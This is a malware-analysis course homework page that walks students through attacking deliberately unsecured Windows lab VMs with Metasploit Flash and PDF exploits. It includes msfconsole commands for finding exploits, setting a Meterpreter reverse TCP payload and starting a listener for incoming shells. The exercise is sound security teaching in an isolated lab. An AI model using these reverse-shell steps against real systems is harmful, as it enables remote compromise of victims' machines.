CS7038-Malware-Analysis

Course Repository for University of Cincinnati Malware Analysis Class (CS7038)

View on GitHub
25 January 2018

VM Setup, Virtual Networking, Traffic Capture

by

HW01: VM Setup, Virtual Networking, Traffic Capture

For this homework assignment, you will be expected to build and run an “attack lab” similar to that demonstrated during the Week 1 & 2 lecture sets.

As your assignment submission, you will draft a report that describes the steps taken and, where necessary, the findings that were discovered, and any artifacts.

For this lab, you should use either of the following networking approaches for your lab VMs:

Feel free to use NAT in order to get something from the Internet onto your VM, just remember to configure it back to one of the above isolated networking methods before executing an attack.

You will need at least two Virtual Machines running:

This assignment will involve identifying exploits and directing an attack against Windows VMs, via a Browser-based Adobe Flash exploit as well as a PDF-based exploit. You will select the exploits you wish to use. Note that you may need to experiment with different versions of Windows and applications to achieve success. You may also end up picking a different exploit after initial tries fail. Also, you may find that you cannot use the same version of Windows for both attacks. In this case, feel free to use different versions of Windows for the attacks.

Establish communicating VMs

Configure both of your VMs to run on the same network. You will either need to configure the DHCP server for VirtualBox’s Host-Only networking, or alternately you may use static IP address assignment.

If you end up having different Windows VMs for your different exploits, then document both of the configurations here. This is the only way I will be able to attempt to recreate your steps.

Unsecuring your VMs

You will need to render your Windows VMs and the applications within them insecure. Some of this was demonstrated in-class, but it is left as an exercise to the students that you make similar configuration changes to any applications and OSes used in this assignment.

Launch attack using Flash browser exploit

Choose a Flash exploit to use for launching an attack against a Windows VM. Document how you configured it.

The following command can be run in msfconsole to identify Adobe Flash exploits:

search type:exploit platform:windows adobe_flash

Make sure that you are using the meterpreter reverse shell payload:

set PAYLOAD windows/meterpreter/reverse_tcp

Don’t forget to set your LHOST option, as well as any others, correctly, such as SRVHOST and URIPATH.

Document the steps taken to build your attack.

Extract the files used in your attack (HTML, SWF, etc.), document basic information about them (file sizes, names, URL names, etc.).

You may need to use wireshark, tcpdump and/or tcpflow to extract these files from an active download:

Launch attack using PDF exploit

Choose a PDF exploit to use for launching an attack against a Windows VM. Document how you configured it.

The following command can be run in msfconsole to identify Adobe Acrobat reader exploits:

search type:exploit platform:windows acrobat

Make sure that you are using the meterpreter reverse shell payload:

set PAYLOAD windows/meterpreter/reverse_tcp

Don’t forget to set your LHOST option, as well as any others, correctly, such as SRVHOST and URIPATH.

Document the steps taken to build your attack.

Listening for incoming shells

You may run into a situation where Metasploit isn’t actively listening for connections when some PDFs are generated. In this situation, it is necessary to start up the Meterpreter listener yourself:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST (your kali IP)
run

You’ll see a message like the one below, telling you it is working:

[*] Started reverse TCP handler on 192.168.56.101:4444

For both attacks

Execute a few commands in Meterpreter. What do they return? What is their purpose? Can you upload and download files from the compromised system? Can you execute programs?

You may need to use wireshark, tcpdump and/or tcpflow to extract these files from an active download:

Submit your report to the appropriate HW assignment on Blackboard. If you have any supporting program files or artifacts, ZIP them up into a ZIP archive and upload that to blackboard as well. However, upload your finished report unzipped as its own file, so the in-blackboard viewer works to display it.

Home

tags: malware - assignment